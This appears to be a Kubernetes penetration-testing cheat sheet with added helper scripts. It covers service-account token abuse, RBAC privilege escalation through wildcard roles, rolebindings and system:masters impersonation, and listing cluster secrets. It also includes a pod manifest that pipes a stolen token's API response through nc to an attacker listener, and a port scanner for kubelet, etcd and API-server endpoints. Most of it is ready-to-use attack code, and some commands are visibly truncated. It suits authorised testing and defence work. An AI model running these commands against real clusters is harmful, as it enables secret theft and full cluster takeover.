# Kubernetes
> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
## Summary
- [Tools](#tools)
- [Service Token](#service-token)
- [RBAC Configuration](#rbac-configuration)
- [Listing Secrets](#listing-secrets)
- [Access Any Resource or Verb](#access-any-resource-or-verb)
- [Pod Creation](#pod-creation)
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
- [Privileged Service Account Token](#privileged-service-account-token)
- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
- [API addresses that you should know](#api-addresses-that-you-should-know)
- [References](#references)
## Tools
* kubeaudit - Audit Kubernetes clusters against common security concerns
* Security risk analysis for Kubernetes resources (tool name and link not preserved in this copy)
* kube-bench - Checks whether Kubernetes is deployed securely by running the CIS Kubernetes Benchmark
* kube-hunter - Hunt for security weaknesses in Kubernetes clusters
* katacoda - Learn Kubernetes using interactive browser-based scenarios
## Service Token
> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod.

```bash
$ cat /var/run/secrets/
```

That token is the pod's identity towards the API server. A `kubectl` run inside the pod picks it up without prompting (in-cluster configuration: the mounted token and CA bundle plus the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` variables), so with a privileged service account, cluster compromise is one `kubectl` command away. The `default` service account has no RBAC permissions beyond API discovery; what the token is worth depends entirely on the roles bound to the account the pod runs as.
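The first thing to do with a mounted token is to learn which identity it asserts and what that identity may do, before touching anything. The following is an added example and not code from the original page: it decodes the token's JWT payload (no signature check, the claims are all that matters here), derives the in-cluster API server address from the environment every pod receives, and asks the API server for the token's own permissions via a SelfSubjectRulesReview (the REST form of `kubectl auth can-i --list`). It assumes the standard mount path `/var/run/secrets/kubernetes.io/serviceaccount`; the `make_fake_sa_token` helper builds an unsigned, constructed token only so the decoding can be exercised offline. This serves both this section and the "Privileged Service Account Token" section below.

```sh
#!/bin/sh
# Added example: recon with the automatically mounted service-account token.
# Assumes the standard projected mount path (assumption, see lead-in).
set -u

SA_DIR=/var/run/secrets/kubernetes.io/serviceaccount

# base64url without padding, the encoding JWT segments use.
b64url_encode() {
    printf '%s' "$1" | base64 | tr -d '\n=' | tr '+/' '-_'
}

# Decode base64url, restoring the padding that JWTs strip.
b64url_decode() {
    s=$1
    case $(( ${#s} % 4 )) in
        2) s="$s==" ;;
        3) s="$s=" ;;
    esac
    printf '%s' "$s" | tr '_-' '/+' | base64 -d
}

# Print the claims (second dot-separated segment) of a service-account JWT.
# The signature is deliberately not verified: we only want the asserted identity.
sa_token_claims() {
    b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"
}

# Constructed, UNSIGNED token carrying the claims a real service-account token
# has, so the functions above can be exercised without a cluster.
make_fake_sa_token() {
    ns=$1; name=$2
    header=$(b64url_encode '{"alg":"RS256","typ":"JWT"}')
    payload=$(b64url_encode "{\"iss\":\"kubernetes/serviceaccount\",\"kubernetes.io/serviceaccount/namespace\":\"$ns\",\"kubernetes.io/serviceaccount/service-account.name\":\"$name\",\"sub\":\"system:serviceaccount:$ns:$name\"}")
    printf '%s.%s.%s' "$header" "$payload" "$(b64url_encode 'not-a-signature')"
}

# In-cluster API server URL from the environment variables every pod gets.
apiserver_url() {
    printf 'https://%s:%s' "${KUBERNETES_SERVICE_HOST:-kubernetes.default.svc}" "${KUBERNETES_SERVICE_PORT:-443}"
}

# Ask the API server what this token may do in a namespace
# (SelfSubjectRulesReview; same answer as `kubectl auth can-i --list -n NS`).
sa_list_permissions() {
    ns=${1:-$(cat "$SA_DIR/namespace")}
    token=$(cat "$SA_DIR/token")
    curl -s --cacert "$SA_DIR/ca.crt" \
        -H "Authorization: Bearer $token" \
        -H 'Content-Type: application/json' \
        -X POST "$(apiserver_url)/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
        -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"$ns\"}}"
}

# Usage from a shell inside the pod:
#   sa_token_claims "$(cat $SA_DIR/token)"    # which service account am I?
#   sa_list_permissions kube-system           # what may I do in kube-system?
```

`sa_list_permissions` uses the mounted `ca.crt` rather than `-k`, so a TLS failure there means the pod is not talking to its own cluster's API server. Tokens issued through the TokenRequest API are short-lived and bound to the pod, so re-read the file rather than caching the value.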
## RBAC Configuration
### Listing Secrets
An attacker that gains access to list secrets in the cluster can use the following curl command to get all secrets in the "kube-system" namespace. Secret values come back base64-encoded in each object's `data` field.

```bash
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```
### Access Any Resource or Verb
A Role or ClusterRole whose rules wildcard both resources and verbs grants every operation on every resource within its scope (the namespace for a Role, the whole cluster for a ClusterRole). Look for rule entries like the following in `kubectl get clusterroles -o yaml` and `kubectl get roles -A -o yaml`:

```yaml
  resources:
  - '*'
  verbs:
  - '*'
```
### Pod Creation
Check what the target role grants with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
Then create a malicious `malicious-pod.yaml` file that runs as that service account. The pod has to be created in the namespace the service account lives in, and `hostNetwork: true` places it in the node's network namespace, which also exposes node-local services to it.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/ | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json"; } | nc -nv 6666; sleep 100000']
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  hostNetwork: true
```

Then `kubectl apply -f malicious-pod.yaml`. The container reads the mounted token, calls the API server with it and pipes the response to a listener the attacker controls; the curl target URL and the `nc` host are missing from the command above and must be supplied.
### Privilege to Use Pods/Exec
`pods/exec` gives a shell in any pod you are allowed to name, and with it that pod's mounted service-account token.

```bash
kubectl exec -it <POD NAME> -n <PODS NAMESPACE> -- sh
```
### Privilege to Get/Patch Rolebindings
The purpose of this JSON file is to bind the admin "ClusterRole" to the compromised service account. Two constraints apply: a RoleBinding grants the referenced ClusterRole only inside its own namespace (a ClusterRoleBinding is needed for cluster-wide effect), and the API server's escalation check refuses the binding unless the creating identity already holds every permission in the role or has the `bind` verb on it.
Create a malicious `malicious-RoleBinding.json` file. The `apiVersion` value and the RBAC path in the first curl command are empty in this copy; `roleRef.apiGroup` must name the RBAC API group, a wildcard there is rejected.

```json
{
  "apiVersion": "",
  "kind": "RoleBinding",
  "metadata": {
    "name": "malicious-rolebinding",
    "namespace": "default"
  },
  "roleRef": {
    "apiGroup": "rbac.authorization.k8s.io",
    "kind": "ClusterRole",
    "name": "admin"
  },
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "sa-comp",
      "namespace": "default"
    }
  ]
}
```

Post the binding with the token that holds create on rolebindings, then read secrets with the token of the service account that was just bound:

```bash
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/ -d @malicious-RoleBinding.json
curl -k -v -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets
```
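The binding above is easy to get subtly wrong (wrong `apiGroup`, wrong scope, wrong REST path), so here is an added example, not code from the original page, that renders either a RoleBinding or a ClusterRoleBinding with the correct RBAC group and version (`rbac.authorization.k8s.io/v1`, the standard group), POSTs it to the matching path, and then checks with `kubectl auth can-i` what the bound service account can actually do. API server address, token, namespace and account names are placeholders; `sa-comp` and `malicious-rolebinding` are taken from the page.

```sh
#!/bin/sh
# Added example: create a (Cluster)RoleBinding over the REST API and verify it.
set -u

# Render the binding as JSON. scope is "namespace" (RoleBinding, effective only
# in $ns) or "cluster" (ClusterRoleBinding, effective everywhere).
render_binding() {
    scope=$1; ns=$2; sa=$3; role=$4; name=${5:-malicious-rolebinding}
    if [ "$scope" = cluster ]; then
        kind=ClusterRoleBinding; meta="\"name\": \"$name\""
    else
        kind=RoleBinding; meta="\"name\": \"$name\", \"namespace\": \"$ns\""
    fi
    # roleRef.apiGroup must be the RBAC group; a wildcard is rejected by the API server.
    printf '{"apiVersion": "rbac.authorization.k8s.io/v1", "kind": "%s", "metadata": {%s}, "roleRef": {"apiGroup": "rbac.authorization.k8s.io", "kind": "ClusterRole", "name": "%s"}, "subjects": [{"kind": "ServiceAccount", "name": "%s", "namespace": "%s"}]}\n' \
        "$kind" "$meta" "$role" "$sa" "$ns"
}

# REST path the binding is POSTed to; ClusterRoleBindings are not namespaced.
binding_path() {
    if [ "$1" = cluster ]; then
        printf '/apis/rbac.authorization.k8s.io/v1/clusterrolebindings'
    else
        printf '/apis/rbac.authorization.k8s.io/v1/namespaces/%s/rolebindings' "$2"
    fi
}

# POST the binding using the token that may create bindings. A 403 with
# "escalation" in the message means the escalation check stopped it.
create_binding() {
    apiserver=$1; token=$2; scope=$3; ns=$4; sa=$5; role=$6
    render_binding "$scope" "$ns" "$sa" "$role" |
        curl -k -s -X POST -H "Authorization: Bearer $token" \
             -H 'Content-Type: application/json' \
             "$apiserver$(binding_path "$scope" "$ns")" -d @-
}

# Check the result from the bound account's point of view, via impersonation.
verify_grant() {
    ns=$1; sa=$2
    kubectl auth can-i --list -n "$ns" --as="system:serviceaccount:$ns:$sa"
}

# Usage (placeholders):
#   create_binding https://<master_ip>:<port> "<JWT TOKEN>" namespace default sa-comp admin
#   create_binding https://<master_ip>:<port> "<JWT TOKEN>" cluster default sa-comp cluster-admin
#   verify_grant kube-system sa-comp
```

`verify_grant` needs the `impersonate` verb for the caller running kubectl; without it, test with the bound account's own token instead.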
### Impersonating a Privileged Account
If the token you hold has the `impersonate` verb on `users` and `groups`, you can act as `system:masters` by adding impersonation headers. The API server requires an `Impersonate-User` header whenever `Impersonate-Group` is set; the user name itself can be arbitrary.

```bash
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```

The same with kubectl: `kubectl --as=null --as-group=system:masters get secrets -n kube-system`.
## Privileged Service Account Token
```bash
$ cat /run/secrets/
$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
```
## Interesting endpoints to reach
```bash
# List Pods
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
# List secrets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
# List deployments (extensions/v1beta1 was removed in Kubernetes 1.16; current clusters serve these under /apis/apps/v1/namespaces/default/deployments)
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/apis/extensions/v1beta1/namespaces/default/deployments
# List daemonsets (same API group change: /apis/apps/v1/namespaces/default/daemonsets)
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
```

A 403 on any of these still confirms the token authenticates; a 401 means it does not.
## API addresses that you should know
*(External network visibility)*

### cAdvisor

Plain HTTP on 4194 in older kubelet deployments; newer kubelets serve the cAdvisor metrics from their own port instead.

```bash
curl http://<IP Address>:4194/metrics
```

### Insecure API server

Port 8080 was the unauthenticated, unencrypted API port (deprecated since 1.10 and gone from current releases). By default it bound to localhost only; one reachable over the network hands out full cluster-admin without any credentials.

```bash
curl http://<IP Address>:8080
```

### Secure API Server

```bash
curl -k https://<IP Address>:(8|6)443/swaggerapi
curl -k https://<IP Address>:(8|6)443/healthz
curl -k https://<IP Address>:(8|6)443/api/v1
```

### etcd API

Read access to etcd is equivalent to cluster-admin: every secret is stored there, base64-encoded unless encryption at rest is configured. `get --prefix --keys-only` is etcd v3 syntax, so set `ETCDCTL_API=3` for etcdctl builds that still default to the v2 API.

```bash
curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
ETCDCTL_API=3 etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
```

### Kubelet API

A kubelet with anonymous authentication and `AlwaysAllow` authorization lets anyone list pods and run commands inside their containers (`/run/<namespace>/<pod>/<container>` with a `cmd` parameter).

```bash
curl -k https://<IP address>:10250
curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods
```

### kubelet (Read only)

```bash
curl http://<IP Address>:10255
```
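Checking those ports one curl at a time is tedious on a larger subnet, so here is an added example, not code from the original page, that sweeps the ports listed above for one host and reports which component answers and whether it answers without credentials. Scheme guesses follow the listing above; where the first guess gets no answer the probe retries with the other scheme, since deployments vary. The host is a placeholder.

```sh
#!/bin/sh
# Added example: probe one host for the Kubernetes component ports above.
set -u

# One probe per line: "port path scheme label". The scheme is a best guess.
K8S_PROBES='8080 /api http insecure-apiserver
6443 /version https apiserver
8443 /version https apiserver
2379 /version http etcd
10250 /pods https kubelet
10255 /pods http kubelet-readonly
4194 /metrics http cadvisor'

# HTTP status for a URL, "000" when nothing answered or the TLS handshake failed
# (e.g. etcd demanding a client certificate).
http_code() {
    code=$(curl -k -s --max-time 3 -o /dev/null -w '%{http_code}' "$1" 2>/dev/null) || true
    printf '%s' "${code:-000}"
}

# Turn a status into what it means for an attacker.
classify() {
    case $1 in
        200) echo "open, no authentication required" ;;
        401|403) echo "open, authentication or RBAC enforced" ;;
        000) echo "no answer" ;;
        *) echo "open, HTTP $1" ;;
    esac
}

# Probe every listed port on a host; one line per port.
probe_host() {
    host=$1
    printf '%s\n' "$K8S_PROBES" | while read -r port path scheme label; do
        code=$(http_code "$scheme://$host:$port$path")
        if [ "$code" = 000 ]; then
            # Retry with the other scheme: TLS where plaintext was expected, or the reverse.
            case $scheme in http) alt=https ;; *) alt=http ;; esac
            code=$(http_code "$alt://$host:$port$path")
            [ "$code" = 000 ] || scheme=$alt
        fi
        printf '%-6s %-18s %-6s %s\n' "$port" "$label" "$scheme" "$(classify "$code")"
    done
}

# Usage:
#   probe_host <IP Address>
```

A 200 on 10250 `/pods`, 2379 `/version` or 8080 `/api` is the finding; a 401 or 403 on 6443 is just a normal cluster. Note that etcd frequently answers `/version` without a client certificate even when the key-value API is protected, so confirm with `etcdctl` before reporting it.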
## References
- Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019
- Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019
- Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon